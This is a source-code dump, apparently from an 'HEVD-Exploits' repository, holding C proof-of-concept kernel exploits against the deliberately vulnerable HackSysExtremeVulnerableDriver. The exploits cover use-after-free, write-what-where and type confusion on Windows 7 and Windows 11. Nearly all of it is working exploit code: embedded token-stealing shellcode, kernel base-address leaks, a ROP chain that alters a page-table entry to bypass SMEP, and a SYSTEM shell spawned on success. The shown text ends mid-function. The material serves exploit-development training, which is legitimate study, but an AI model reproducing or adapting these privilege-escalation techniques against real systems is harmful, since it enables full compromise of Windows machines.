IOCTL(0x807) 14 | 15 | typedef struct _FAKE_OBJECT_NON_PAGED_POOL 16 | { 17 | CHAR Buffer[0x58]; 18 | } FAKE_OBJECT_NON_PAGED_POOL, *PFAKE_OBJECT_NON_PAGED_POOL; 19 | 20 | /* sendIoctl: 21 | Send the IOCTL code to the driver */ 22 | void sendIoctl(HANDLE hHEVD, DWORD dIoctl, CHAR *pBuffer, DWORD dBuffer) 23 | { 24 | DWORD bytesReturned = 0; 25 | 26 | printf("[*] Calling IOCTL Code 0x%x\n", dIoctl); 27 | DeviceIoControl(hHEVD, 28 | dIoctl, 29 | pBuffer, 30 | dBuffer, 31 | NULL, 32 | 0x00, 33 | &bytesReturned, 34 | NULL); 35 | 36 | return; 37 | } 38 | 39 | /* allocate_buffer: 40 | Creates a userland allocation with the first 4 bytes pointing to the address where our shellcode 41 | was allocated. */ 42 | char *allocate_buffer(void *shellcode_addr) 43 | { 44 | char *buffer = malloc(sizeof(FAKE_OBJECT_NON_PAGED_POOL)); 45 | if (buffer != NULL) 46 | { 47 | printf("[*] Shellcode located at: %p\n", &shellcode_addr); 48 | memcpy(buffer, &shellcode_addr, 4); 49 | memset(buffer+4, 'A', 83); 50 | } 51 | 52 | return buffer; 53 | } 54 | 55 | int main() 56 | { 57 | HANDLE hHEVD = NULL; 58 | char *evilBuffer = NULL; 59 | 60 | char shellcode[] = 61 | 62 | // sickle -a x86 -p windows/x86/kernel_token_stealer -f c -m pinpoint 63 | "\x60" // pushal 64 | "\x31\xc0" // xor eax, eax 65 | "\x64\x8b\x80\x24\x01\x00\x00" // mov eax, dword ptr fs:[eax + 0x124] 66 | "\x8b\x40\x50" // mov eax, dword ptr [eax + 0x50] 67 | "\x89\xc1" // mov ecx, eax 68 | "\xba\x04\x00\x00\x00" // mov edx, 4 69 | "\x8b\x80\xb8\x00\x00\x00" // mov eax, dword ptr [eax + 0xb8] 70 | "\x2d\xb8\x00\x00\x00" // sub eax, 0xb8 71 | "\x39\x90\xb4\x00\x00\x00" // cmp dword ptr [eax + 0xb4], edx 72 | "\x75\xed" // jne 0x1014 73 | "\x8b\x90\xf8\x00\x00\x00" // mov edx, dword ptr [eax + 0xf8] 74 | "\x89\x91\xf8\x00\x00\x00" // mov dword ptr [ecx + 0xf8], edx 75 | "\x61" // popal 76 | 77 | // return to userland code 78 | "\x31\xc0" // xor eax,eax 79 | "\xC3"; // ret 80 | 81 | LPVOID lpPayload = VirtualAlloc(NULL, 82 | 56, 83 | (MEM_COMMIT | MEM_RESERVE), 84 | PAGE_EXECUTE_READWRITE); 85 | 86 | if (lpPayload == NULL) 87 | { 88 | printf("[-] Failed to create shellcode allocation\n"); 89 | return -1; 90 | } 91 | 92 | memcpy(lpPayload, shellcode, 56); 93 | 94 | hHEVD = CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 95 | (GENERIC_READ | GENERIC_WRITE), 96 | 0x00, 97 | NULL, 98 | OPEN_EXISTING, 99 | FILE_ATTRIBUTE_NORMAL, 100 | NULL); 101 | 102 | if (hHEVD == INVALID_HANDLE_VALUE) 103 | { 104 | printf("[-] Failed to get a handle on HackSysExtremeVulnerableDriver\n"); 105 | return -1; 106 | } 107 | 108 | evilBuffer = allocate_buffer(lpPayload); 109 | if (evilBuffer == NULL) 110 | { 111 | printf("[*] Failed to allocate evil buffer (userland)\n"); 112 | return -1; 113 | } 114 | 115 | printf("[*] Allocating PUSE_AFTER_FREE_NON_PAGED_POOL object\n"); 116 | sendIoctl(hHEVD, HEVD_ALLOCATE_ROBJ, NULL, 0); 117 | 118 | printf("[*] Freeing object\n"); 119 | sendIoctl(hHEVD, HEVD_FREE, NULL, 0); 120 | 121 | printf("[*] Allocating FAKE_OBJECT_NON_PAGED_POOL\n"); 122 | sendIoctl(hHEVD, HEVD_ALLOCATE_FOBJ, evilBuffer, sizeof(FAKE_OBJECT_NON_PAGED_POOL)); 123 | 124 | printf("[*] Triggering UAF\n"); 125 | sendIoctl(hHEVD, HEVD_CALL_FPTR, NULL, 0); 126 | 127 | printf("[+] Enjoy the shell :)\n\n"); 128 | 129 | system("cmd.exe"); 130 | } 131 | -------------------------------------------------------------------------------- /HEVD-Exploits/0x03 - Arbitrary Write (Write-What-Where)/Windows 11 (x64)/makefile: -------------------------------------------------------------------------------- 1 | poc.exe: poc.c 2 | x86_64-w64-mingw32-gcc poc.c -o poc.exe 3 | -------------------------------------------------------------------------------- /HEVD-Exploits/0x03 - Arbitrary Write (Write-What-Where)/Windows 11 (x64)/poc.c: -------------------------------------------------------------------------------- 1 | /* wetw0rk */ 2 | 3 | #include 4 | #include 5 | #include 6 | #include 7 | 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | 14 | #define ARBITRARY_WRITE 0x22200b 15 | #define TARGET_FUNCTION 0x22206f 16 | 17 | /* Structure used by Write-What-Where */ 18 | typedef struct _WRITE_WHAT_WHERE 19 | { 20 | uint64_t *ullpWhat; 21 | uint64_t *ullpWhere; 22 | } WRITE_WHAT_WHERE, *PWRITE_WHAT_WHERE; 23 | 24 | /* GetKernelModuleBase(): 25 | Function used to obtain kernel module address */ 26 | LPVOID GetKernelModuleBase(PCHAR pKernelModule) 27 | { 28 | char pcDriver[1024] = { 0 }; 29 | LPVOID lpvTargetDriver = NULL; 30 | LPVOID *lpvDrivers = NULL; 31 | DWORD dwCB = 0; 32 | DWORD dwDrivers = 0; 33 | DWORD i = 0; 34 | 35 | EnumDeviceDrivers(NULL, dwCB, &dwCB); 36 | if (dwCB <= 0) 37 | return NULL; 38 | 39 | lpvDrivers = (LPVOID *)malloc(dwCB * sizeof(LPVOID)); 40 | if (lpvDrivers == NULL) 41 | return NULL; 42 | 43 | if (EnumDeviceDrivers(lpvDrivers, dwCB, &dwCB)) 44 | { 45 | dwDrivers = dwCB / sizeof(LPVOID); 46 | for (i = 0; i < dwDrivers; i++) 47 | if (GetDeviceDriverBaseNameA(lpvDrivers[i], pcDriver, sizeof(pcDriver))) 48 | if (StrStrA(pcDriver, pKernelModule) != NULL) 49 | lpvTargetDriver = lpvDrivers[i]; 50 | } 51 | 52 | free(lpvDrivers); 53 | 54 | return lpvTargetDriver; 55 | } 56 | 57 | /* WriteBytes(): 58 | This function triggers the Write-What-Where vulnerability */ 59 | void WriteBytes(HANDLE hHEVD, uint64_t ullWhat, uint64_t ullWhere) 60 | { 61 | DWORD dwBytesReturned = 0; 62 | WRITE_WHAT_WHERE www = { 0 }; 63 | 64 | www.ullpWhere = (uint64_t *)ullWhere; 65 | www.ullpWhat = &ullWhat; 66 | printf("\t[*] Writing 0x%p to 0x%p\n", *www.ullpWhat, www.ullpWhere); 67 | 68 | DeviceIoControl(hHEVD, 69 | ARBITRARY_WRITE, 70 | &www, 71 | sizeof(WRITE_WHAT_WHERE), 72 | NULL, 73 | 0x00, 74 | &dwBytesReturned, 75 | NULL); 76 | 77 | return; 78 | } 79 | 80 | /* CheckWin(): 81 | Simple function to check if we're running as SYSTEM */ 82 | int CheckWin(VOID) 83 | { 84 | DWORD win = 0; 85 | DWORD dwLen = 0; 86 | CHAR *cUsername = NULL; 87 | 88 | GetUserNameA(NULL, &dwLen); 89 | 90 | if (dwLen > 0) { 91 | cUsername = (CHAR *)malloc(dwLen * sizeof(CHAR)); 92 | } else { 93 | printf("[-] Failed to allocate buffer for username check\n"); 94 | return -1; 95 | } 96 | 97 | GetUserNameA(cUsername, &dwLen); 98 | 99 | win = strcmp(cUsername, "SYSTEM"); 100 | free(cUsername); 101 | 102 | return (win == 0) ? win : -1; 103 | } 104 | 105 | /* Exploit(): 106 | Arbitrary Write */ 107 | int Exploit(HANDLE hHEVD) 108 | { 109 | LPVOID pHEVDBase = NULL; 110 | DWORD i = 0; 111 | DWORD dwShellcodeLength = 0; 112 | DWORD dwBytesReturned = 0; 113 | uint64_t ullTarget = 0; 114 | uint64_t ullRawBytes = 0; 115 | 116 | CHAR cRawBytes[60] = { 0 }; 117 | CHAR shellcode[]= 118 | /* ALIGNMENT */ 119 | "\x90\x90" 120 | 121 | /* python3 sickle.py -p windows/x64/kernel_token_stealer -f c -m pinpoint (58 bytes) */ 122 | "\x65\x48\xa1\x88\x01\x00\x00\x00\x00\x00\x00" // movabs rax, qword ptr gs:[0x188] 123 | "\x48\x8b\x80\xb8\x00\x00\x00" // mov rax, qword ptr [rax + 0xb8] 124 | "\x48\x89\xc1" // mov rcx, rax 125 | "\xb2\x04" // mov dl, 4 126 | "\x48\x8b\x80\x48\x04\x00\x00" // mov rax, qword ptr [rax + 0x448] 127 | "\x48\x2d\x48\x04\x00\x00" // sub rax, 0x448 128 | "\x38\x90\x40\x04\x00\x00" // cmp byte ptr [rax + 0x440], dl 129 | "\x75\xeb" // jne 0x1017 130 | "\x48\x8b\x90\xb8\x04\x00\x00" // mov rdx, qword ptr [rax + 0x4b8] 131 | "\x48\x89\x91\xb8\x04\x00\x00" // mov qword ptr [rcx + 0x4b8], rdx 132 | 133 | /* KERNEL RECOVERY */ 134 | "\x48\x31\xc0" /* xor rax, rax */ 135 | "\xc3"; /* ret */ 136 | 137 | dwShellcodeLength = 64; 138 | if ((dwShellcodeLength % 8) != 0) 139 | { 140 | printf("[-] Shellcode must be divisible by 8\n"); 141 | return -1; 142 | } 143 | 144 | pHEVDBase = GetKernelModuleBase("HEVD"); 145 | if (pHEVDBase == NULL) 146 | { 147 | printf("[-] Failed to obtain the base address of HEVD\n"); 148 | return -1; 149 | } 150 | printf("[*] Obtained the base address of HEVD: 0x%p\n", pHEVDBase); 151 | 152 | ullTarget = (uint64_t)pHEVDBase + 0x85b14; 153 | printf("[*] Overwriting memory @{DeleteArbitraryReadWriteHelperObjecNonPagedPoolNxIoctlHandler}\n"); 154 | 155 | /* Same operation as the Windows 7 exploit just ported to work on 64bit addressing */ 156 | for (i = 0; i < dwShellcodeLength; i += sizeof(uint64_t)) 157 | { 158 | sprintf(cRawBytes, "0x%02x%02x%02x%02x%02x%02x%02x%02x", ((uint32_t)shellcode[i+7] & 0xff), 159 | ((uint32_t)shellcode[i+6] & 0xff), 160 | ((uint32_t)shellcode[i+5] & 0xff), 161 | ((uint32_t)shellcode[i+4] & 0xff), 162 | ((uint32_t)shellcode[i+3] & 0xff), 163 | ((uint32_t)shellcode[i+2] & 0xff), 164 | ((uint32_t)shellcode[i+1] & 0xff), 165 | ((uint32_t)shellcode[i+0] & 0xff)); 166 | 167 | ullRawBytes = strtoull(cRawBytes, NULL, 16); 168 | WriteBytes(hHEVD, ullRawBytes, ullTarget); 169 | memset(cRawBytes, '\0', 60); 170 | ullTarget += sizeof(uint64_t); 171 | } 172 | 173 | printf("[*] Shellcode buffer written!!\n"); 174 | printf("[*] Calling DeleteArbitraryReadWriteHelperObjecNonPagedPoolNxIoctlHandler\n"); 175 | DeviceIoControl(hHEVD, 176 | TARGET_FUNCTION, 177 | NULL, 178 | 0x00, 179 | NULL, 180 | 0x00, 181 | &dwBytesReturned, 182 | NULL); 183 | 184 | return CheckWin(); 185 | } 186 | 187 | int main() 188 | { 189 | HANDLE hHEVD = NULL; 190 | 191 | hHEVD = CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 192 | (GENERIC_READ | GENERIC_WRITE), 193 | 0x00, 194 | NULL, 195 | OPEN_EXISTING, 196 | FILE_ATTRIBUTE_NORMAL, 197 | NULL); 198 | 199 | if (hHEVD == INVALID_HANDLE_VALUE) 200 | { 201 | printf("[-] Failed to get a handle on HackSysExtremeVulnerableDriver\n"); 202 | return -1; 203 | } 204 | 205 | if (Exploit(hHEVD) == 0) { 206 | printf("[+] Exploitation successful, enjoy the shell!!\n\n"); 207 | system("cmd.exe"); 208 | } else { 209 | printf("[*] Exploitation failed, run again\n"); 210 | } 211 | 212 | if (hHEVD != NULL) 213 | CloseHandle(hHEVD); 214 | 215 | return 0; 216 | } 217 | -------------------------------------------------------------------------------- /HEVD-Exploits/0x03 - Arbitrary Write (Write-What-Where)/Windows 7 (x86)/makefile: -------------------------------------------------------------------------------- 1 | poc.exe: poc.c 2 | i686-w64-mingw32-gcc poc.c -o poc.exe 3 | -------------------------------------------------------------------------------- /HEVD-Exploits/0x03 - Arbitrary Write (Write-What-Where)/Windows 7 (x86)/poc.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | 12 | #define ARW_HELPER_OBJECTS 3 13 | #define MAX_OBJECT_COUNT 65535 14 | 15 | #define IOCTL(Function) CTL_CODE (FILE_DEVICE_UNKNOWN, Function, METHOD_NEITHER, FILE_ANY_ACCESS) 16 | 17 | #define HEVD_IOCTL_ARBITRARY_WRITE IOCTL(0x802) 18 | #define HEVD_IOCTL_DELETE_ARW_HELPER_OBJECT_NON_PAGED_POOL_NX IOCTL(0x81B) 19 | 20 | /* Structure used by Write-What-Where */ 21 | typedef struct _WRITE_WHAT_WHERE 22 | { 23 | PULONG_PTR What; 24 | PULONG_PTR Where; 25 | } WRITE_WHAT_WHERE, *PWRITE_WHAT_WHERE; 26 | 27 | /* typdef signature for ZwQuerySystemInformation */ 28 | typedef NTSTATUS (__stdcall *ZWQUERYSYSTEMINFORMATION)( 29 | SYSTEM_INFORMATION_CLASS SystemInformationClass, 30 | PVOID SystemInformation, 31 | ULONG SystemInformationLength, 32 | PULONG ReturnLength 33 | ); 34 | 35 | /* Structures used by KernelGetModuleBase */ 36 | typedef struct _SYSTEM_MODULE_ENTRY 37 | { 38 | HANDLE Section; 39 | PVOID MappedBase; 40 | PVOID ImageBase; 41 | ULONG ImageSize; 42 | ULONG Flags; 43 | USHORT LoadOrderIndex; 44 | USHORT InitOrderIndex; 45 | USHORT LoadCount; 46 | USHORT OffsetToFileName; 47 | UCHAR FullPathName[256]; 48 | } SYSTEM_MODULE_ENTRY, *PSYSTEM_MODULE_ENTRY; 49 | 50 | typedef struct _SYSTEM_MODULE_INFORMATION 51 | { 52 | ULONG Count; 53 | SYSTEM_MODULE_ENTRY Module[1]; 54 | } SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION; 55 | 56 | /* KernelGetModuleBase(): 57 | Function used to obtain kernel module address */ 58 | PVOID KernelGetModuleBase(PCHAR pcModuleName) 59 | { 60 | HANDLE hModule = NULL; 61 | PVOID pSystemInfo = NULL; 62 | PVOID pModule = NULL; 63 | ZWQUERYSYSTEMINFORMATION ZwQuerySystemInformation = NULL; 64 | NTSTATUS status = 0xc000009a; // STATUS_INSUFFICIENT_RESOURCES 65 | SYSTEM_INFORMATION_CLASS SystemModuleInformation = 0x0B; 66 | ULONG SystemInfoSize = 0; 67 | 68 | hModule = LoadLibraryA("ntdll.dll"); 69 | if (hModule == NULL) 70 | { 71 | printf("[-] Failed to load ntdll.dll\n"); 72 | return NULL; 73 | } 74 | 75 | ZwQuerySystemInformation = (ZWQUERYSYSTEMINFORMATION)GetProcAddress(hModule, "ZwQuerySystemInformation"); 76 | if (ZwQuerySystemInformation == NULL) 77 | { 78 | printf("[-] Failed to find ZwQuerySystemInformation within ntdll.dll"); 79 | CloseHandle(hModule); 80 | return NULL; 81 | } 82 | 83 | /* Obtain the size of the requested information */ 84 | status = ZwQuerySystemInformation(SystemModuleInformation, 85 | NULL, 86 | SystemInfoSize, 87 | &SystemInfoSize); 88 | 89 | if (SystemInfoSize == 0) { 90 | printf("[*] Failed to get size of SystemInformation\n"); 91 | CloseHandle(hModule); 92 | return NULL; 93 | } 94 | 95 | pSystemInfo = (PSYSTEM_MODULE_INFORMATION)malloc(SystemInfoSize); 96 | if (pSystemInfo == NULL) 97 | { 98 | printf("[-] Failed to allocate buffer for SystemInformation\n"); 99 | CloseHandle(hModule); 100 | return NULL; 101 | } 102 | memset(pSystemInfo, '\0', SystemInfoSize); 103 | 104 | /* Obtain the SystemModuleInformation */ 105 | status = ZwQuerySystemInformation(SystemModuleInformation, 106 | pSystemInfo, 107 | SystemInfoSize, 108 | &SystemInfoSize); 109 | 110 | PSYSTEM_MODULE_ENTRY pSysModule = ((PSYSTEM_MODULE_INFORMATION)(pSystemInfo))->Module; 111 | for (unsigned long i = 0; i < ((PSYSTEM_MODULE_INFORMATION)(pSystemInfo))->Count; i++) 112 | { 113 | if (StrStrA(pSysModule[i].FullPathName, pcModuleName) != NULL) 114 | { 115 | pModule = pSysModule[i].ImageBase; 116 | } 117 | } 118 | 119 | if (hModule != NULL) 120 | { 121 | CloseHandle(hModule); 122 | } 123 | 124 | return pModule; 125 | } 126 | 127 | /* CheckWin(): 128 | Simple function to check if we're running as SYSTEM */ 129 | int CheckWin(VOID) 130 | { 131 | DWORD win = 0; 132 | DWORD dwLen = 0; 133 | CHAR *cUsername = NULL; 134 | 135 | GetUserNameA(NULL, &dwLen); 136 | 137 | if (dwLen > 0) { 138 | cUsername = (CHAR *)malloc(dwLen * sizeof(CHAR)); 139 | } else { 140 | printf("[-] Failed to allocate buffer for username check\n"); 141 | return -1; 142 | } 143 | 144 | GetUserNameA(cUsername, &dwLen); 145 | 146 | win = strcmp(cUsername, "SYSTEM"); 147 | free(cUsername); 148 | 149 | return (win == 0) ? win : -1; 150 | } 151 | 152 | /* WriteBytes(): 153 | This function triggers the Write-What-Where vulnerability */ 154 | void WriteBytes(HANDLE hHEVD, ULONG ulWhat, ULONG ulWhere) 155 | { 156 | DWORD dwBytesReturned; 157 | WRITE_WHAT_WHERE www = { 0 }; 158 | 159 | www.Where = (PULONG)ulWhere; 160 | www.What = &ulWhat; 161 | printf("\t[*] Writing 0x%p to 0x%p\n", *www.What, www.Where); 162 | 163 | DeviceIoControl(hHEVD, 164 | HEVD_IOCTL_ARBITRARY_WRITE, 165 | &www, 166 | sizeof(WRITE_WHAT_WHERE), 167 | NULL, 168 | 0x00, 169 | &dwBytesReturned, 170 | NULL); 171 | return; 172 | } 173 | 174 | /* Exploit(): 175 | Arbitrary write */ 176 | int Exploit(HANDLE hHEVD) 177 | { 178 | DWORD i = 0; 179 | DWORD dwShellcodeLength = 0; 180 | DWORD dwBytesReturned = 0; 181 | ULONG target = 0; 182 | ULONG ulRawBytes = 0; 183 | PVOID pHEVDBase = NULL; 184 | CHAR cRawBytes[60] = { 0 }; 185 | 186 | CHAR cShellcode[]= 187 | "\x90\x90\x90" // nops 188 | 189 | // sickle -p windows/x86/kernel_token_stealer -f c -m pinpoint 190 | "\x60" // pushal 191 | "\x31\xc0" // xor eax, eax 192 | "\x64\x8b\x80\x24\x01\x00\x00" // mov eax, dword ptr fs:[eax + 0x124] 193 | "\x8b\x40\x50" // mov eax, dword ptr [eax + 0x50] 194 | "\x89\xc1" // mov ecx, eax 195 | "\xba\x04\x00\x00\x00" // mov edx, 4 196 | "\x8b\x80\xb8\x00\x00\x00" // mov eax, dword ptr [eax + 0xb8] 197 | "\x2d\xb8\x00\x00\x00" // sub eax, 0xb8 198 | "\x39\x90\xb4\x00\x00\x00" // cmp dword ptr [eax + 0xb4], edx 199 | "\x75\xed" // jne 0x1014 200 | "\x8b\x90\xf8\x00\x00\x00" // mov edx, dword ptr [eax + 0xf8] 201 | "\x89\x91\xf8\x00\x00\x00" // mov dword ptr [ecx + 0xf8], edx 202 | "\x61" // popal 203 | 204 | /* return code (sickle -a x86 -m asm_shell) */ 205 | "\x31\xc0" // xor eax, eax 206 | "\xc2\x08\x00"; // ret 0x8 207 | 208 | dwShellcodeLength = 60; 209 | if ((dwShellcodeLength % 4) != 0) 210 | { 211 | printf("[-] Shellcode must by divisible by 4\n"); 212 | return -1; 213 | } 214 | 215 | pHEVDBase = KernelGetModuleBase("HEVD"); 216 | if (pHEVDBase == NULL) 217 | { 218 | printf("[-] Failed to obtain the base address of HEVD\n"); 219 | return -1; 220 | } 221 | printf("[*] Obtained HEVD base address: 0x%p\n", pHEVDBase); 222 | 223 | target = (ULONG)pHEVDBase + 0x448f2; 224 | printf("[*] Overwriting memory @{DeleteArbitraryReadWriteHelperObjecNonPagedPoolNxIoctlHandler}\n"); 225 | 226 | /* This is a quick for loop I whipped up to write our shellcode. The way this works is the buffer 227 | is converted into a little endian ASCII address (e.g 0x41424344 -> 0x44434241) then we convert 228 | the ASCII address to an unsigned long integer (4 bytes) to be written via the Write-What-Where 229 | vulnerability. Each iteration we increment the target address by 4 (32bit address) to point to 230 | the next address, we also increment the pointer to the shellcode array by 4 (we can only write 231 | 4 bytes at a time). */ 232 | for (i = 0; i < dwShellcodeLength; i += 4) 233 | { 234 | sprintf(cRawBytes, "0x%02x%02x%02x%02x", ((uint32_t)cShellcode[i+3] & 0xff), 235 | ((uint32_t)cShellcode[i+2] & 0xff), 236 | ((uint32_t)cShellcode[i+1] & 0xff), 237 | ((uint32_t)cShellcode[i+0] & 0xff)); 238 | 239 | ulRawBytes = strtoul(cRawBytes, NULL, 16); 240 | WriteBytes(hHEVD, ulRawBytes, target); 241 | memset(cRawBytes, '\0', 60); 242 | target += 4; 243 | } 244 | 245 | printf("[+] Calling DeleteArbitraryReadWriteHelperObjecNonPagedPoolNx\n"); 246 | DeviceIoControl(hHEVD, 247 | HEVD_IOCTL_DELETE_ARW_HELPER_OBJECT_NON_PAGED_POOL_NX, 248 | NULL, 249 | 0, 250 | NULL, 251 | 0x00, 252 | &dwBytesReturned, 253 | NULL); 254 | 255 | return CheckWin(); 256 | } 257 | 258 | int main() 259 | { 260 | HANDLE hHEVD = NULL; 261 | hHEVD = CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 262 | (GENERIC_READ | GENERIC_WRITE), 263 | 0x00, 264 | NULL, 265 | OPEN_EXISTING, 266 | FILE_ATTRIBUTE_NORMAL, 267 | NULL); 268 | 269 | if (hHEVD == INVALID_HANDLE_VALUE) 270 | { 271 | printf("[-] Failed to get a handle on HackSysExtremeVulnerableDriver\n"); 272 | return -1; 273 | } 274 | 275 | if (Exploit(hHEVD) == 0) { 276 | printf("[+] Exploitation successful, enjoy your shell!\n\n"); 277 | system("cmd.exe"); 278 | } else { 279 | printf("[-] Exploitation failed, run again\n"); 280 | return -1; 281 | } 282 | 283 | if (hHEVD != INVALID_HANDLE_VALUE) { 284 | CloseHandle(hHEVD); 285 | } 286 | } 287 | -------------------------------------------------------------------------------- /HEVD-Exploits/0x04 - Type Confusion/Windows 11 (x64)/makefile: -------------------------------------------------------------------------------- 1 | poc.exe: poc.c 2 | x86_64-w64-mingw32-gcc poc.c -o poc.exe 3 | -------------------------------------------------------------------------------- /HEVD-Exploits/0x04 - Type Confusion/Windows 11 (x64)/poc.c: -------------------------------------------------------------------------------- 1 | /* wetw0rk */ 2 | 3 | #include 4 | #include 5 | #include 6 | #include 7 | 8 | #include 9 | #include 10 | #include 11 | #include 12 | 13 | #define TYPE_CONFUSION 0x222023 14 | 15 | /* Structure used by Type Confusion */ 16 | typedef struct _USER_TYPE_CONFUSION_OBJECT { 17 | uint64_t ObjectId; 18 | uint64_t ObjectType; 19 | } USER_TYPE_CONFUSION_OBJECT, *PUSER_TYPE_CONFUSION_OBJECT; 20 | 21 | /* GetKernelModuleBase(): 22 | Function used to obtain kernel module address */ 23 | LPVOID GetKernelModuleBase(PCHAR pKernelModule) 24 | { 25 | char pcDriver[1024] = { 0 }; 26 | LPVOID lpvTargetDriver = NULL; 27 | LPVOID *lpvDrivers = NULL; 28 | DWORD dwCB = 0; 29 | DWORD dwDrivers = 0; 30 | DWORD i = 0; 31 | 32 | EnumDeviceDrivers(NULL, dwCB, &dwCB); 33 | if (dwCB <= 0) 34 | return NULL; 35 | 36 | lpvDrivers = (LPVOID *)malloc(dwCB * sizeof(LPVOID)); 37 | if (lpvDrivers == NULL) 38 | return NULL; 39 | 40 | if (EnumDeviceDrivers(lpvDrivers, dwCB, &dwCB)) 41 | { 42 | dwDrivers = dwCB / sizeof(LPVOID); 43 | for (i = 0; i < dwDrivers; i++) 44 | if (GetDeviceDriverBaseNameA(lpvDrivers[i], pcDriver, sizeof(pcDriver))) 45 | if (StrStrA(pcDriver, pKernelModule) != NULL) 46 | lpvTargetDriver = lpvDrivers[i]; 47 | } 48 | 49 | free(lpvDrivers); 50 | 51 | return lpvTargetDriver; 52 | } 53 | 54 | /* CheckWin(): 55 | Simple function to check if we're running as SYSTEM */ 56 | int CheckWin(VOID) 57 | { 58 | DWORD win = 0; 59 | DWORD dwLen = 0; 60 | CHAR *cUsername = NULL; 61 | 62 | GetUserNameA(NULL, &dwLen); 63 | 64 | if (dwLen > 0) { 65 | cUsername = (CHAR *)malloc(dwLen * sizeof(CHAR)); 66 | } else { 67 | printf("[-] Failed to allocate buffer for username check\n"); 68 | return -1; 69 | } 70 | 71 | GetUserNameA(cUsername, &dwLen); 72 | 73 | win = strcmp(cUsername, "SYSTEM"); 74 | free(cUsername); 75 | 76 | return (win == 0) ? win : -1; 77 | } 78 | 79 | void WriteGadgets(LPVOID lpvNt, LPVOID lpvBuffer) 80 | { 81 | uint64_t *rop = (uint64_t *)(lpvBuffer); 82 | uint64_t nt = (uint64_t)(lpvNt); 83 | 84 | uint8_t sc[129] = { 85 | // sickle-tool -p windows/x64/kernel_token_stealer -f num (58 bytes) 86 | 0x65, 0x48, 0xa1, 0x88, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 87 | 0xb8, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xb2, 0x04, 0x48, 0x8b, 0x80, 0x48, 0x04, 88 | 0x00, 0x00, 0x48, 0x2d, 0x48, 0x04, 0x00, 0x00, 0x38, 0x90, 0x40, 0x04, 0x00, 0x00, 89 | 0x75, 0xeb, 0x48, 0x8b, 0x90, 0xb8, 0x04, 0x00, 0x00, 0x48, 0x89, 0x91, 0xb8, 0x04, 90 | 0x00, 0x00, 91 | 92 | // sickle-tool -p windows/x64/kernel_sysret -f num (71) 93 | 0x65, 0x48, 0xa1, 0x88, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x66, 0x8b, 0x88, 94 | 0xe4, 0x01, 0x00, 0x00, 0x66, 0xff, 0xc1, 0x66, 0x89, 0x88, 0xe4, 0x01, 0x00, 0x00, 95 | 0x48, 0x8b, 0x90, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x8a, 0x68, 0x01, 0x00, 0x00, 96 | 0x4c, 0x8b, 0x9a, 0x78, 0x01, 0x00, 0x00, 0x48, 0x8b, 0xa2, 0x80, 0x01, 0x00, 0x00, 97 | 0x48, 0x8b, 0xaa, 0x58, 0x01, 0x00, 0x00, 0x31, 0xc0, 0x0f, 0x01, 0xf8, 0x48, 0x0f, 98 | 0x07 }; 99 | 100 | LPVOID shellcode = VirtualAlloc(NULL, sizeof(sc), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); 101 | RtlCopyMemory(shellcode, sc, 129); 102 | 103 | /* Prepare RDX register for later. This is needed for the XOR operation */ 104 | *rop++ = nt + 0x40ed4e; // pop rdx ; pop rax ; pop rcx ; ret 105 | *rop++ = 0x000008; // Set RDX to 0x08, we will need this to accomplish the XOR 106 | *rop++ = 0x000000; // [filler] 107 | *rop++ = 0x000000; // [filler] 108 | 109 | /* Setup the call to MiGetPteAddress in order to get the address of the PTE for our 110 | userland code. The setup is as follows: 111 | 112 | RAX -> VOID *MiGetPteAddress( 113 | ( RCX == PTE / Userland Code ) 114 | ); 115 | 116 | Once the call is complete RAX should contain the pointer to our PTE. */ 117 | *rop++ = nt + 0x57699c; // pop rcx ; ret 118 | *rop++ = (uint64_t)shellcode; // *shellcode 119 | *rop++ = nt + 0x24aaec; // MiGetPteAddress() 120 | 121 | /* Now that we have obtained the PTE address, we can modify the 2nd bit in order to 122 | mark the page as a kernel page (U -> K). We can do this using XOR ;) */ 123 | *rop++ = nt + 0x30fcf3; // sub rax, rdx ; ret 124 | *rop++ = nt + 0x54f344; // push rax ; pop rbx ; ret 125 | *rop++ = nt + 0x40ed4e; // pop rdx ; pop rax ; pop rcx ; ret 126 | *rop++ = 0x000004; // 0x40ed4e: pop rdx ; pop rax ; pop rcx ; ret ; (1 found) 127 | *rop++ = 0x000000; // [filler] 128 | *rop++ = 0x000000; // [filler] 129 | *rop++ = nt + 0x3788b6; // xor [rbx+0x08], edx ; mov rbx, qword [rsp+0x60] ; add rsp, 0x40 ; pop r14 ; pop rdi ; pop rbp ; ret 130 | 131 | /* Now we cam spray our shellcode address since SMEP and VPS should be bypassed */ 132 | for (int i = 0; i < 0xC; i++) { 133 | *rop++ = (uint64_t)shellcode; 134 | } 135 | } 136 | 137 | /* Exploit(): 138 | Type Confusion */ 139 | int Exploit(HANDLE hHEVD) 140 | { 141 | uint64_t *rop = NULL; 142 | BOOL bBlocked; 143 | DWORD dwBytesReturned = 0; 144 | LPVOID lpvNtKrnl = NULL; 145 | LPVOID lpvAllocation = NULL; 146 | LPVOID lpvAllocTarget = NULL; 147 | USER_TYPE_CONFUSION_OBJECT UserTypeConfusionObject = { 0 }; 148 | 149 | lpvNtKrnl = GetKernelModuleBase("ntoskrnl"); 150 | if (lpvNtKrnl == NULL) 151 | { 152 | printf("[-] Failed to obtain the base address of nt\n"); 153 | return -1; 154 | } 155 | printf("[*] Obtained the base address of nt: 0x%p\n", lpvNtKrnl); 156 | 157 | /* Allocate memory one page before the target memory region. This helps prevent 158 | the Double Fault; Logic here is avoid not triggering "Demand Paging". */ 159 | lpvAllocTarget = (LPVOID)0x48000000; 160 | printf("[*] Allocation to be made at 0x%p - PAGE_SIZE\n", lpvAllocTarget); 161 | lpvAllocation = VirtualAlloc((lpvAllocTarget - 0x1000), 162 | 0x10000, 163 | (MEM_COMMIT | MEM_RESERVE), 164 | PAGE_READWRITE); 165 | if (lpvAllocation == NULL) 166 | { 167 | printf("[*] Failed to allocate memory\n"); 168 | 